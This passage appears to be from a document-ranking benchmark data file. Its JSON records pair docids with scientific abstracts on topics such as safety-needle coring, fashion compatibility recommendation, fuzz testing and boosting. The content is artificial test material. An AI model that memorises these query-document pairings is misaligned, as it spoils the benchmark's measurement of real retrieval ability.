"text": "With the advent of safety needles to prevent inadvertent needle sticks in the operating room (OR), a potentially new issue has arisen. These needles may result in coring, or the shaving off of fragments of the rubber stopper, when the needle is pierced through the rubber stopper of the medication vial. These fragments may be left in the vial and then drawn up with the medication and possibly injected into patients. The current study prospectively evaluated the incidence of coring when blunt and sharp needles were used to pierce rubber topped vials. We also evaluated the incidence of coring in empty medication vials with rubber tops. The rubber caps were then pierced with either an18-gauge sharp hypodermic needle or a blunt plastic (safety) needle. Coring occurred in 102 of 250 (40.8%) vials when a blunt needle was used versus 9 of 215 (4.2%) vials with a sharp needle (P < 0.0001). A significant incidence of coring was demonstrated when a blunt plastic safety needle was used. This situation is potentially a patient safety hazard and methods to eliminate this problem are needed.",
"title": ""
},
{
"docid": "89c52082d42a9f6445a7771852db3330",
"text": "Total quality management (TQM) is an approach to management embracing both social and technical dimensions aimed at achieving excellent results, which needs to be put into practice through a specific framework. Nowadays, quality award models, such as the Malcolm Baldrige National Quality Award (MBNQA) and the European Foundation for Quality Management (EFQM) Excellence Model, are used as a guide to TQM implementation by a large number of organizations. Nevertheless, there is a paucity of empirical research confirming whether these models clearly reflect the main premises of TQM. The purpose of this paper is to analyze the extent to which the EFQM Excellence Model captures the main assumptions involved in the TQM concept, that is, the distinction between technical and social TQM issues, the holistic interpretation of TQM in the firm, and the causal linkage between TQM procedures and organizational performance. Based on responses collected from managers of 446 Spanish companies by means of a structured questionnaire, we find that: (a) social and technical dimensions are embedded in the model; (b) both dimensions are intercorrelated; (c) they jointly enhance results. These findings support the EFQM Excellence Model as an operational framework for TQM, and also reinforce the results obtained in previous studies for the MBNQA, suggesting that quality award models really are TQM frameworks. 2008 Elsevier B.V. All rights reserved. * Corresponding author. Tel.: +34 964 72 85 34; fax: +34 964 72 86 29. E-mail address: bou@emp.uji.es (J.C. Bou-Llusar).",
"title": ""
},
{
"docid": "198311a68ad3b9ee8020b91d0b029a3c",
"text": "Online multi-object tracking aims at producing complete tracks of multiple objects using the information accumulated up to the present moment. It still remains a difficult problem in complex scenes, because of frequent occlusion by clutter or other objects, similar appearances of different objects, and other factors. In this paper, we propose a robust online multi-object tracking method that can handle these difficulties effectively. We first propose the tracklet confidence using the detectability and continuity of a tracklet, and formulate a multi-object tracking problem based on the tracklet confidence. The multi-object tracking problem is then solved by associating tracklets in different ways according to their confidence values. Based on this strategy, tracklets sequentially grow with online-provided detections, and fragmented tracklets are linked up with others without any iterative and expensive associations. Here, for reliable association between tracklets and detections, we also propose a novel online learning method using an incremental linear discriminant analysis for discriminating the appearances of objects. By exploiting the proposed learning method, tracklet association can be successfully achieved even under severe occlusion. Experiments with challenging public datasets show distinct performance improvement over other batch and online tracking methods.",
"title": ""
},
{
"docid": "e3b91b1133a09d7c57947e2cd85a17c7",
"text": "Although mobile devices are gaining more and more capabilities (i.e. CPU power, memory, connectivity, ...), they still fall short to execute complex rich media and data analysis applications. Offloading to the cloud is not always a solution, because of the high WAN latencies, especially for applications with real-time constraints such as augmented reality. Therefore the cloud has to be moved closer to the mobile user in the form of cloudlets. Instead of moving a complete virtual machine from the cloud to the cloudlet, we propose a more fine grained cloudlet concept that manages applications on a component level. Cloudlets do not have to be fixed infrastructure close to the wireless access point, but can be formed in a dynamic way with any device in the LAN network with available resources. We present a cloudlet architecture together with a prototype implementation, showing the advantages and capabilities for a mobile real-time augmented reality application.",
"title": ""
},
{
"docid": "b7fc7aa3a0824c71bc3b00f335b7b65e",
"text": "In this paper we advocate the use of device-to-device (D2D) communications in a LoRaWAN Low Power Wide Area Network (LPWAN). After overviewing the critical features of the LoRaWAN technology, we discuss the pros and cons of enabling the D2D communications for it. Subsequently we propose a network-assisted D2D communications protocol and show its feasibility by implementing it on top of a LoRaWAN-certified commercial transceiver. The conducted experiments show the performance of the proposed D2D communications protocol and enable us to assess its performance. More precisely, we show that the D2D communications can reduce the time and energy for data transfer by 6 to 20 times compared to conventional LoRaWAN data transfer mechanisms. In addition, the use of D2D communications may have a positive effect on the network by enabling spatial re-use of the frequency resources. The proposed LoRaWAN D2D communications can be used for a wide variety of applications requiring high coverage, e.g. use cases in distributed smart grid deployments for management and trading.",
"title": ""
},
{
"docid": "eb7990a677cd3f96a439af6620331400",
"text": "Solving the visual symbol grounding problem has long been a goal of artificial intelligence. The field appears to be advancing closer to this goal with recent breakthroughs in deep learning for natural language grounding in static images. In this paper, we propose to translate videos directly to sentences using a unified deep neural network with both convolutional and recurrent structure. Described video datasets are scarce, and most existing methods have been applied to toy domains with a small vocabulary of possible words. By transferring knowledge from 1.2M+ images with category labels and 100,000+ images with captions, our method is able to create sentence descriptions of open-domain videos with large vocabularies. We compare our approach with recent work using language generation metrics, subject, verb, and object prediction accuracy, and a human evaluation.",
"title": ""
},
{
"docid": "9a9dc194e0ca7d1bb825e8aed5c9b4fe",
"text": "In this paper we show how to divide data <italic>D</italic> into <italic>n</italic> pieces in such a way that <italic>D</italic> is easily reconstructable from any <italic>k</italic> pieces, but even complete knowledge of <italic>k</italic> - 1 pieces reveals absolutely no information about <italic>D</italic>. This technique enables the construction of robust key management schemes for cryptographic systems that can function securely and reliably even when misfortunes destroy half the pieces and security breaches expose all but one of the remaining pieces.",
"title": ""
},
{
"docid": "fbf2a211d53603cbcb7441db3006f035",
"text": "This letter presents a new metamaterial-based waveguide technology referred to as ridge gap waveguides. The main advantages of the ridge gap waveguides compared to hollow waveguides are that they are planar and much cheaper to manufacture, in particular at high frequencies such as for millimeter and sub- millimeter waves. The latter is due to the fact that there are no mechanical joints across which electric currents must float. The gap waveguides have lower losses than microstrip lines, and they are completely shielded by metal so no additional packaging is needed, in contrast to the severe packaging problems associated with microstrip circuits. The gap waveguides are realized in a narrow gap between two parallel metal plates by using a texture or multilayer structure on one of the surfaces. The waves follow metal ridges in the textured surface. All wave propagation in other directions is prohibited (in cutoff) by realizing a high surface impedance (ideally a perfect magnetic conductor) in the textured surface at both sides of all ridges. Thereby, cavity resonances do not appear either within the band of operation. The present letter introduces the gap waveguide and presents some initial simulated results.",
"title": ""
},
{
"docid": "de4e2e131a0ceaa47934f4e9209b1cdd",
"text": "With the popularity of mobile devices, spatial crowdsourcing is rising as a new framework that enables human workers to solve tasks in the physical world. With spatial crowdsourcing, the goal is to crowdsource a set of spatiotemporal tasks (i.e., tasks related to time and location) to a set of workers, which requires the workers to physically travel to those locations in order to perform the tasks. In this article, we focus on one class of spatial crowdsourcing, in which the workers send their locations to the server and thereafter the server assigns to every worker tasks in proximity to the worker’s location with the aim of maximizing the overall number of assigned tasks. We formally define this maximum task assignment (MTA) problem in spatial crowdsourcing, and identify its challenges. We propose alternative solutions to address these challenges by exploiting the spatial properties of the problem space, including the spatial distribution and the travel cost of the workers. MTA is based on the assumptions that all tasks are of the same type and all workers are equally qualified in performing the tasks. Meanwhile, different types of tasks may require workers with various skill sets or expertise. Subsequently, we extend MTA by taking the expertise of the workers into consideration. We refer to this problem as the maximum score assignment (MSA) problem and show its practicality and generality. Extensive experiments with various synthetic and two real-world datasets show the applicability of our proposed framework.",
"title": ""
},
{
"docid": "b38529e74442de80822204b63d061e3e",
"text": "Factors other than age and genetics may increase the risk of developing Alzheimer disease (AD). Accumulation of the amyloid-β (Aβ) peptide in the brain seems to initiate a cascade of key events in the pathogenesis of AD. Moreover, evidence is emerging that the sleep–wake cycle directly influences levels of Aβ in the brain. In experimental models, sleep deprivation increases the concentration of soluble Aβ and results in chronic accumulation of Aβ, whereas sleep extension has the opposite effect. Furthermore, once Aβ accumulates, increased wakefulness and altered sleep patterns develop. Individuals with early Aβ deposition who still have normal cognitive function report sleep abnormalities, as do individuals with very mild dementia due to AD. Thus, sleep and neurodegenerative disease may influence each other in many ways that have important implications for the diagnosis and treatment of AD.",
"title": ""
}
] | scidocsrr |
aec3495b00da5eac9d2efd3fd0ce67c1 | Complete the Look: Scene-based Complementary Product Recommendation | [
{
"docid": "0a625d5f0164f7ed987a96510c1b6092",
"text": "We present a method that learns to answer visual questions by selecting image regions relevant to the text-based query. Our method maps textual queries and visual features from various regions into a shared space where they are compared for relevance with an inner product. Our method exhibits significant improvements in answering questions such as \"what color,\" where it is necessary to evaluate a specific location, and \"what room,\" where it selectively identifies informative image regions. Our model is tested on the recently released VQA [1] dataset, which features free-form human-annotated questions and answers.",
"title": ""
},
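The preceding abstract describes scoring image regions against a text query with an inner product in a shared space. Below is a minimal illustrative sketch of that idea, assuming pre-extracted region features and a question embedding; all names, dimensions and projections are hypothetical, not the paper's actual model.

```python
# Illustrative sketch only: rank image regions by relevance to a question
# embedding via an inner product in a shared space.
import numpy as np

def region_attention(region_feats, question_vec, W_img, W_txt):
    # Map both modalities into a shared space and compare by inner product.
    img = region_feats @ W_img          # (n_regions, d_shared)
    txt = question_vec @ W_txt          # (d_shared,)
    scores = img @ txt                  # relevance of each region to the query
    weights = np.exp(scores - scores.max())
    return weights / weights.sum()      # softmax over regions

# Toy usage with random projections standing in for learned parameters.
rng = np.random.default_rng(0)
regions = rng.normal(size=(14, 2048))   # e.g., 14 region descriptors
question = rng.normal(size=300)         # e.g., a 300-d text embedding
print(region_attention(regions, question, rng.normal(size=(2048, 512)),
                       rng.normal(size=(300, 512))).round(3))
```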
{
"docid": "26884c49c5ada3fc80dbc2f2d1e5660b",
"text": "We introduce a complete pipeline for recognizing and classifying people’s clothing in natural scenes. This has several interesting applications, including e-commerce, event and activity recognition, online advertising, etc. The stages of the pipeline combine a number of state-of-the-art building blocks such as upper body detectors, various feature channels and visual attributes. The core of our method consists of a multi-class learner based on a Random Forest that uses strong discriminative learners as decision nodes. To make the pipeline as automatic as possible we also integrate automatically crawled training data from the web in the learning process. Typically, multi-class learning benefits from more labeled data. Because the crawled data may be noisy and contain images unrelated to our task, we extend Random Forests to be capable of transfer learning from different domains. For evaluation, we define 15 clothing classes and introduce a benchmark data set for the clothing classification task consisting of over 80, 000 images, which we make publicly available. We report experimental results, where our classifier outperforms an SVM baseline with 41.38 % vs 35.07 % average accuracy on challenging benchmark data.",
"title": ""
},
{
"docid": "790de0f792c81b9e26676f800e766759",
"text": "The ubiquity of online fashion shopping demands effective recommendation services for customers. In this paper, we study two types of fashion recommendation: (i) suggesting an item that matches existing components in a set to form a stylish outfit (a collection of fashion items), and (ii) generating an outfit with multimodal (images/text) specifications from a user. To this end, we propose to jointly learn a visual-semantic embedding and the compatibility relationships among fashion items in an end-to-end fashion. More specifically, we consider a fashion outfit to be a sequence (usually from top to bottom and then accessories) and each item in the outfit as a time step. Given the fashion items in an outfit, we train a bidirectional LSTM (Bi-LSTM) model to sequentially predict the next item conditioned on previous ones to learn their compatibility relationships. Further, we learn a visual-semantic space by regressing image features to their semantic representations aiming to inject attribute and category information as a regularization for training the LSTM. The trained network can not only perform the aforementioned recommendations effectively but also predict the compatibility of a given outfit. We conduct extensive experiments on our newly collected Polyvore dataset, and the results provide strong qualitative and quantitative evidence that our framework outperforms alternative methods.",
"title": ""
},
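The abstract above treats an outfit as a sequence and trains a bidirectional LSTM to predict the next item. Below is a minimal sketch of such a model, assuming items arrive as pre-extracted feature vectors (e.g., CNN image embeddings); the module, dimensions and parameter names are illustrative assumptions, not the authors' implementation.

```python
# Illustrative sketch only: a bidirectional LSTM that scores the next fashion
# item in a partial outfit sequence.
import torch
import torch.nn as nn

class OutfitBiLSTM(nn.Module):
    def __init__(self, feat_dim=512, hidden_dim=256):
        super().__init__()
        # Bidirectional LSTM over the item sequence (top -> bottom -> accessories).
        self.lstm = nn.LSTM(feat_dim, hidden_dim, batch_first=True, bidirectional=True)
        # Project LSTM states back into the item-feature space for scoring.
        self.proj = nn.Linear(2 * hidden_dim, feat_dim)

    def forward(self, outfit_feats):
        # outfit_feats: (batch, seq_len, feat_dim)
        states, _ = self.lstm(outfit_feats)
        return self.proj(states)                              # (batch, seq_len, feat_dim)

    def score_candidates(self, outfit_feats, candidate_feats):
        # Score candidate items against the representation of the last position.
        pred = self.forward(outfit_feats)[:, -1, :]           # (batch, feat_dim)
        return pred @ candidate_feats.t()                     # (batch, n_candidates)

# Toy usage with random features standing in for real CNN embeddings.
model = OutfitBiLSTM()
outfit = torch.randn(2, 4, 512)        # two partial outfits of four items each
candidates = torch.randn(100, 512)     # pool of candidate items
print(model.score_candidates(outfit, candidates).shape)  # torch.Size([2, 100])
```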
{
"docid": "4322f123ff6a1bd059c41b0037bac09b",
"text": "Nowadays, as a beauty-enhancing product, clothing plays an important role in human's social life. In fact, the key to a proper outfit usually lies in the harmonious clothing matching. Nevertheless, not everyone is good at clothing matching. Fortunately, with the proliferation of fashion-oriented online communities, fashion experts can publicly share their fashion tips by showcasing their outfit compositions, where each fashion item (e.g., a top or bottom) usually has an image and context metadata (e.g., title and category). Such rich fashion data offer us a new opportunity to investigate the code in clothing matching. However, challenges co-exist with opportunities. The first challenge lies in the complicated factors, such as color, material and shape, that affect the compatibility of fashion items. Second, as each fashion item involves multiple modalities (i.e., image and text), how to cope with the heterogeneous multi-modal data also poses a great challenge. Third, our pilot study shows that the composition relation between fashion items is rather sparse, which makes traditional matrix factorization methods not applicable. Towards this end, in this work, we propose a content-based neural scheme to model the compatibility between fashion items based on the Bayesian personalized ranking (BPR) framework. The scheme is able to jointly model the coherent relation between modalities of items and their implicit matching preference. Experiments verify the effectiveness of our scheme, and we deliver deep insights that can benefit future research.",
"title": ""
}
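The abstract above models compatibility between fashion items under the Bayesian personalized ranking (BPR) framework. Below is a minimal sketch of a BPR-style pairwise loss over item embeddings, assuming a simple bilinear compatibility score; names and dimensions are assumptions, not the paper's code.

```python
# Illustrative sketch only: BPR pairwise ranking loss for top-bottom compatibility.
import torch
import torch.nn.functional as F

def compatibility(top, bottom, W):
    # Bilinear compatibility score m(top, bottom) = top^T W bottom.
    return torch.einsum('bd,de,be->b', top, W, bottom)

def bpr_loss(top, pos_bottom, neg_bottom, W):
    # BPR assumption: an observed (top, pos_bottom) pair should score higher
    # than an unobserved (top, neg_bottom) pair.
    pos = compatibility(top, pos_bottom, W)
    neg = compatibility(top, neg_bottom, W)
    return -F.logsigmoid(pos - neg).mean()

# Toy usage with random embeddings standing in for learned item features.
d = 64
W = torch.randn(d, d, requires_grad=True)
tops, pos, neg = torch.randn(8, d), torch.randn(8, d), torch.randn(8, d)
loss = bpr_loss(tops, pos, neg, W)
loss.backward()
print(float(loss))
```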
] | [
{
"docid": "444a6e64bfc9a76a9ef6d122e746e457",
"text": "When performing tasks, humans are thought to adopt task sets that configure moment-to-moment data processing. Recently developed mixed blocked/event-related designs allow task set-related signals to be extracted in fMRI experiments, including activity related to cues that signal the beginning of a task block, \"set-maintenance\" activity sustained for the duration of a task block, and event-related signals for different trial types. Data were conjointly analyzed from mixed design experiments using ten different tasks and 183 subjects. Dorsal anterior cingulate cortex/medial superior frontal cortex (dACC/msFC) and bilateral anterior insula/frontal operculum (aI/fO) showed reliable start-cue and sustained activations across all or nearly all tasks. These regions also carried the most reliable error-related signals in a subset of tasks, suggesting that the regions form a \"core\" task-set system. Prefrontal regions commonly related to task control carried task-set signals in a smaller subset of tasks and lacked convergence across signal types.",
"title": ""
},
{
"docid": "bb447bbd4df92339bace55dc5610fbcc",
"text": "Fuzz testing has helped security researchers and organizations discover a large number of vulnerabilities. Although it is efficient and widely used in industry, hardly any empirical studies and experience exist on the customization of fuzzers to real industrial projects. In this paper, collaborating with the engineers from Huawei, we present the practice of adapting fuzz testing to a proprietary message middleware named libmsg, which is responsible for the message transfer of the entire distributed system department. We present the main obstacles coming across in applying an efficient fuzzer to libmsg, including system configuration inconsistency, system build complexity, fuzzing driver absence. The solutions for those typical obstacles are also provided. For example, for the most difficult and expensive obstacle of writing fuzzing drivers, we present a low-cost approach by converting existing sample code snippets into fuzzing drivers. After overcoming those obstacles, we can effectively identify software bugs, and report 9 previously unknown vulnerabilities, including flaws that lead to denial of service or system crash.",
"title": ""
},
{
"docid": "909e55c3359543bf7ed3e5659d7cc27f",
"text": "We study the link between family violence and the emotional cues associated with wins and losses by professional football teams. We hypothesize that the risk of violence is affected by the “gain-loss” utility of game outcomes around a rationally expected reference point. Our empirical analysis uses police reports of violent incidents on Sundays during the professional football season. Controlling for the pregame point spread and the size of the local viewing audience, we find that upset losses (defeats when the home team was predicted to win by four or more points) lead to a 10% increase in the rate of at-home violence by men against their wives and girlfriends. In contrast, losses when the game was expected to be close have small and insignificant effects. Upset wins (victories when the home team was predicted to lose) also have little impact on violence, consistent with asymmetry in the gain-loss utility function. The rise in violence after an upset loss is concentrated in a narrow time window near the end of the game and is larger for more important games. We find no evidence for reference point updating based on the halftime score.",
"title": ""
},
{
"docid": "e153d11b932e303d65cee83803fec739",
"text": "Recently, open-domain question answering (QA) has been combined with machine comprehension models to find answers in a large knowledge source. As open-domain QA requires retrieving relevant documents from text corpora to answer questions, its performance largely depends on the performance of document retrievers. However, since traditional information retrieval systems are not effective in obtaining documents with a high probability of containing answers, they lower the performance of QA systems. Simply extracting more documents increases the number of irrelevant documents, which also degrades the performance of QA systems. In this paper, we introduce Paragraph Ranker which ranks paragraphs of retrieved documents for a higher answer recall with less noise. We show that ranking paragraphs and aggregating answers using Paragraph Ranker improves performance of open-domain QA pipeline on the four opendomain QA datasets by 7.8% on average.",
"title": ""
},
{
"docid": "bcb45064e07cf9bc3b3686f9ce18b422",
"text": "Detection of speaker, channel and environment changes in a continuous audio stream is important in various applications (e.g., broadcast news, meetings/teleconferences etc.). Standard schemes for segmentation use a classi er and hence do not generalize to unseen speaker / channel / environments. Recently S.Chen introduced new segmentation and clustering algorithms, using the so-called BIC. This paper presents more accurate and more e cient variants of the BIC scheme for segmentation and clustering. Speci cally, the new algorithms improve the speed and accuracy of segmentation and clustering and allow for a real-time implementation of simultaneous transcription, segmentation and speaker tracking.",
"title": ""
},
{
"docid": "dd05084594640b9ab87c702059f7a366",
"text": "Researchers and theorists have proposed that feelings of attachment to subgroups within a larger online community or site can increase users' loyalty to the site. They have identified two types of attachment, with distinct causes and consequences. With bond-based attachment, people feel connections to other group members, while with identity-based attachment they feel connections to the group as a whole. In two experiments we show that these feelings of attachment to subgroups increase loyalty to the larger community. Communication with other people in a subgroup but not simple awareness of them increases attachment to the larger community. By varying how the communication is structured, between dyads or with all group members simultaneously, the experiments show that bond- and identity-based attachment have different causes. But the experiments show no evidence that bond and identity attachment have different consequences. We consider both theoretical and methodological reasons why the consequences of bond-based and identity-based attachment are so similar.",
"title": ""
},
{
"docid": "7c829563e98a6c75eb9b388bf0627271",
"text": "Research in learning analytics and educational data mining has recently become prominent in the fields of computer science and education. Most scholars in the field emphasize student learning and student data analytics; however, it is also important to focus on teaching analytics and teacher preparation because of their key roles in student learning, especially in K-12 learning environments. Nonverbal communication strategies play an important role in successful interpersonal communication of teachers with their students. In order to assist novice or practicing teachers with exhibiting open and affirmative nonverbal cues in their classrooms, we have designed a multimodal teaching platform with provisions for online feedback. We used an interactive teaching rehearsal software, TeachLivE, as our basic research environment. TeachLivE employs a digital puppetry paradigm as its core technology. Individuals walk into this virtual environment and interact with virtual students displayed on a large screen. They can practice classroom management, pedagogy and content delivery skills with a teaching plan in the TeachLivE environment. We have designed an experiment to evaluate the impact of an online nonverbal feedback application. In this experiment, different types of multimodal data have been collected during two experimental settings. These data include talk-time and nonverbal behaviors of the virtual students, captured in log files; talk time and full body tracking data of the participant; and video recording of the virtual classroom with the participant. 34 student teachers participated in this 30-minute experiment. In each of the settings, the participants were provided with teaching plans from which they taught. All the participants took part in both of the experimental settings. In order to have a balanced experiment design, half of the participants received nonverbal online feedback in their first session and the other half received this feedback in the second session. A visual indication was used for feedback each time the participant exhibited a closed, defensive posture. Based on recorded full-body tracking data, we observed that only those who received feedback in their first session demonstrated a significant number of open postures in the session containing no feedback. However, the post-questionnaire information indicated that all participants were more mindful of their body postures while teaching after they had participated in the study.",
"title": ""
},
{
"docid": "3f96a3cd2e3f795072567a3f3c8ccc46",
"text": "Good corporate reputations are critical because of their potential for value creation, but also because their intangible character makes replication by competing firms considerably more difficult. Existing empirical research confirms that there is a positive relationship between reputation and financial performance. This paper complements these findings by showing that firms with relatively good reputations are better able to sustain superior profit outcomes over time. In particular, we undertake an analysis of the relationship between corporate reputation and the dynamics of financial performance using two complementary dynamic models. We also decompose overall reputation into a component that is predicted by previous financial performance, and that which is ‘left over’, and find that each (orthogonal) element supports the persistence of above-average profits over time. Copyright 2002 John Wiley & Sons, Ltd.",
"title": ""
},
{
"docid": "18810138af571332e67d42c27816cf6b",
"text": "In this work we address the task of segmenting an object into its parts, or semantic part segmentation. We start by adapting a state-of-the-art semantic segmentation system to this task, and show that a combination of a fully-convolutional Deep CNN system coupled with Dense CRF labelling provides excellent results for a broad range of object categories. Still, this approach remains agnostic to highlevel constraints between object parts. We introduce such prior information by means of the Restricted Boltzmann Machine, adapted to our task and train our model in an discriminative fashion, as a hidden CRF, demonstrating that prior information can yield additional improvements. We also investigate the performance of our approach “in the wild”, without information concerning the objects’ bounding boxes, using an object detector to guide a multi-scale segmentation scheme. We evaluate the performance of our approach on the Penn-Fudan and LFW datasets for the tasks of pedestrian parsing and face labelling respectively. We show superior performance with respect to competitive methods that have been extensively engineered on these benchmarks, as well as realistic qualitative results on part segmentation, even for occluded or deformable objects. We also provide quantitative and extensive qualitative results on three classes from the PASCAL Parts dataset. Finally, we show that our multi-scale segmentation scheme can boost accuracy, recovering segmentations for finer parts.",
"title": ""
},
{
"docid": "1ee33deb30b4ffae5ea16dc4ad2f93ff",
"text": "Neural network quantization has become an important research area due to its great impact on deployment of large models on resource constrained devices. In order to train networks that can be effectively discretized without loss of performance, we introduce a differentiable quantization procedure. Differentiability can be achieved by transforming continuous distributions over the weights and activations of the network to categorical distributions over the quantization grid. These are subsequently relaxed to continuous surrogates that can allow for efficient gradient-based optimization. We further show that stochastic rounding can be seen as a special case of the proposed approach and that under this formulation the quantization grid itself can also be optimized with gradient descent. We experimentally validate the performance of our method on MNIST, CIFAR 10 and Imagenet classification.",
"title": ""
},
{
"docid": "046837c87b6d6c789cc060c1dfa273c0",
"text": "The last 20 years have seen ever-increasing research activity in the field of human activity recognition. With activity recognition having considerably matured, so has the number of challenges in designing, implementing, and evaluating activity recognition systems. This tutorial aims to provide a comprehensive hands-on introduction for newcomers to the field of human activity recognition. It specifically focuses on activity recognition using on-body inertial sensors. We first discuss the key research challenges that human activity recognition shares with general pattern recognition and identify those challenges that are specific to human activity recognition. We then describe the concept of an Activity Recognition Chain (ARC) as a general-purpose framework for designing and evaluating activity recognition systems. We detail each component of the framework, provide references to related research, and introduce the best practice methods developed by the activity recognition research community. We conclude with the educational example problem of recognizing different hand gestures from inertial sensors attached to the upper and lower arm. We illustrate how each component of this framework can be implemented for this specific activity recognition problem and demonstrate how different implementations compare and how they impact overall recognition performance.",
"title": ""
},
{
"docid": "b4b0cbc448b45d337627b39029b6c60e",
"text": "Multi-task learning (MTL) improves the prediction performance on multiple, different but related, learning problems through shared parameters or representations. One of the most prominent multi-task learning algorithms is an extension to support vector machines (svm) by Evgeniou et al. [15]. Although very elegant, multi-task svm is inherently restricted by the fact that support vector machines require each class to be addressed explicitly with its own weight vector which, in a multi-task setting, requires the different learning tasks to share the same set of classes. This paper proposes an alternative formulation for multi-task learning by extending the recently published large margin nearest neighbor (lmnn) algorithm to the MTL paradigm. Instead of relying on separating hyperplanes, its decision function is based on the nearest neighbor rule which inherently extends to many classes and becomes a natural fit for multi-task learning. We evaluate the resulting multi-task lmnn on real-world insurance data and speech classification problems and show that it consistently outperforms single-task kNN under several metrics and state-of-the-art MTL classifiers.",
"title": ""
},
{
"docid": "f573c79dde4ce12c234df084dea149b4",
"text": "The presence of geometric details on object surfaces dramatically changes the way light interacts with these surfaces. Although synthesizing realistic pictures requires simulating this interaction as faithfully as possible, explicitly modeling all the small details tends to be impractical. To address these issues, an image-based technique called relief mapping has recently been introduced for adding per-fragment details onto arbitrary polygonal models (Policarpo et al. 2005). The technique has been further extended to render correct silhouettes (Oliveira and Policarpo 2005) and to handle non-height-field surface details (Policarpo and Oliveira 2006). In all its variations, the ray-height-field intersection is performed using a binary search, which refines the result produced by some linear search procedure. While the binary search converges very fast, the linear search (required to avoid missing large structures) is prone to aliasing, by possibly missing some thin structures, as is evident in Figure 18-1a. Several space-leaping techniques have since been proposed to accelerate the ray-height-field intersection and to minimize the occurrence of aliasing (Donnelly 2005, Dummer 2006, Baboud and Décoret 2006). Cone step mapping (CSM) (Dummer 2006) provides a clever solution to accelerate the intersection calculation for the average case and avoids skipping height-field structures by using some precomputed data (a cone map). However, because CSM uses a conservative approach, the rays tend to stop before the actual surface, which introduces different Relaxed Cone Stepping for Relief Mapping",
"title": ""
},
{
"docid": "00dbe58bcb7d4415c01a07255ab7f365",
"text": "The paper deals with a time varying vehicle-to-vehicle channel measurement in the 60 GHz millimeter wave (MMW) band using a unique time-domain channel sounder built from off-the-shelf components and standard measurement devices and employing Golay complementary sequences as the excitation signal. The aim of this work is to describe the sounder architecture, primary data processing technique, achievable system parameters, and preliminary measurement results. We measured the signal propagation between two passing vehicles and characterized the signal reflected by a car driving on a highway. The proper operation of the channel sounder is verified by a reference measurement performed with an MMW vector network analyzer in a rugged stationary office environment. The goal of the paper is to show the measurement capability of the sounder and its superior features like 8 GHz measuring bandwidth enabling high time resolution or good dynamic range allowing an analysis of weak multipath components.",
"title": ""
},
{
"docid": "7568508f9bb5d45f7cd24ddf9da46c1f",
"text": "Boosting is a set of methods for the construction of classifier ensembles. The differential feature of these methods is that they allow to obtain a strong classifier from the combination of weak classifiers. Therefore, it is possible to use boosting methods with very simple base classifiers. One of the most simple classifiers are decision stumps, decision trees with only one decision node. This work proposes a variant of the most well-known boosting method, AdaBoost. It is based on considering, as the base classifiers for boosting, not only the last weak classifier, but a classifier formed by the last r selected weak classifiers (r is a parameter of the method). If the weak classifiers are decision stumps, the combination of r weak classifiers is a decision tree. The ensembles obtained with the variant are formed by the same number of decision stumps than the original AdaBoost. Hence, the original version and the variant produce classifiers with very similar sizes and computational complexities (for training and classification). The experimental study shows that the variant is clearly beneficial. 2007 Elsevier B.V. All rights reserved.",
"title": ""
},
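The abstract above builds on AdaBoost with decision stumps. The sketch below shows plain discrete AdaBoost with stumps, i.e., the baseline the variant starts from; the paper's variant, which additionally groups the last r selected stumps into a small tree, is not reproduced here, and all names are illustrative.

```python
# Illustrative sketch only: discrete AdaBoost with exhaustively searched decision stumps.
import numpy as np

def fit_stump(X, y, w):
    # Pick the (feature, threshold, polarity) with the lowest weighted error.
    best = None
    for j in range(X.shape[1]):
        for thr in np.unique(X[:, j]):
            for pol in (1, -1):
                pred = np.where(pol * (X[:, j] - thr) > 0, 1, -1)
                err = w[pred != y].sum()
                if best is None or err < best[0]:
                    best = (err, j, thr, pol)
    return best

def adaboost(X, y, n_rounds=20):
    n = len(y)
    w = np.full(n, 1.0 / n)
    ensemble = []
    for _ in range(n_rounds):
        err, j, thr, pol = fit_stump(X, y, w)
        err = max(err, 1e-10)
        alpha = 0.5 * np.log((1 - err) / err)
        pred = np.where(pol * (X[:, j] - thr) > 0, 1, -1)
        w *= np.exp(-alpha * y * pred)      # up-weight misclassified points
        w /= w.sum()
        ensemble.append((alpha, j, thr, pol))
    return ensemble

def predict(ensemble, X):
    score = sum(a * np.where(p * (X[:, j] - t) > 0, 1, -1) for a, j, t, p in ensemble)
    return np.sign(score)

# Toy usage on a linearly separable problem with labels in {-1, +1}.
rng = np.random.default_rng(0)
X = rng.normal(size=(200, 2))
y = np.where(X[:, 0] + X[:, 1] > 0, 1, -1)
model = adaboost(X, y)
print((predict(model, X) == y).mean())
```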
{
"docid": "8609f49cc78acc1ba25e83c8e68040a6",
"text": "Time series shapelets are small, local patterns in a time series that are highly predictive of a class and are thus very useful features for building classifiers and for certain visualization and summarization tasks. While shapelets were introduced only recently, they have already seen significant adoption and extension in the community. Despite their immense potential as a data mining primitive, there are two important limitations of shapelets. First, their expressiveness is limited to simple binary presence/absence questions. Second, even though shapelets are computed offline, the time taken to compute them is significant. In this work, we address the latter problem by introducing a novel algorithm that finds shapelets in less time than current methods by an order of magnitude. Our algorithm is based on intelligent caching and reuse of computations, and the admissible pruning of the search space. Because our algorithm is so fast, it creates an opportunity to consider more expressive shapelet queries. In particular, we show for the first time an augmented shapelet representation that distinguishes the data based on conjunctions or disjunctions of shapelets. We call our novel representation Logical-Shapelets. We demonstrate the efficiency of our approach on the classic benchmark datasets used for these problems, and show several case studies where logical shapelets significantly outperform the original shapelet representation and other time series classification techniques. We demonstrate the utility of our ideas in domains as diverse as gesture recognition, robotics, and biometrics.",
"title": ""
},
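The abstract above relies on the shapelet primitive: the distance from a candidate shapelet to a time series is the minimum distance over all same-length sliding windows. Below is a minimal sketch of that primitive (assuming NumPy >= 1.20 for sliding_window_view); the paper's caching, pruning, and logical combinations of shapelets are not shown.

```python
# Illustrative sketch only: minimum Euclidean distance between a shapelet and
# all sliding windows of a time series.
import numpy as np

def shapelet_distance(series, shapelet):
    m = len(shapelet)
    windows = np.lib.stride_tricks.sliding_window_view(series, m)
    return np.sqrt(((windows - shapelet) ** 2).sum(axis=1)).min()

# Toy usage: a bump-shaped shapelet is much closer to a series containing a bump.
t = np.linspace(0, 1, 20)
bump = np.exp(-((t - 0.5) ** 2) / 0.01)
series_with_bump = np.concatenate([np.zeros(40), bump, np.zeros(40)])
series_flat = np.zeros(100)
print(shapelet_distance(series_with_bump, bump), shapelet_distance(series_flat, bump))
```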
{
"docid": "5f120ae2429d7b3c8085f96a63eae817",
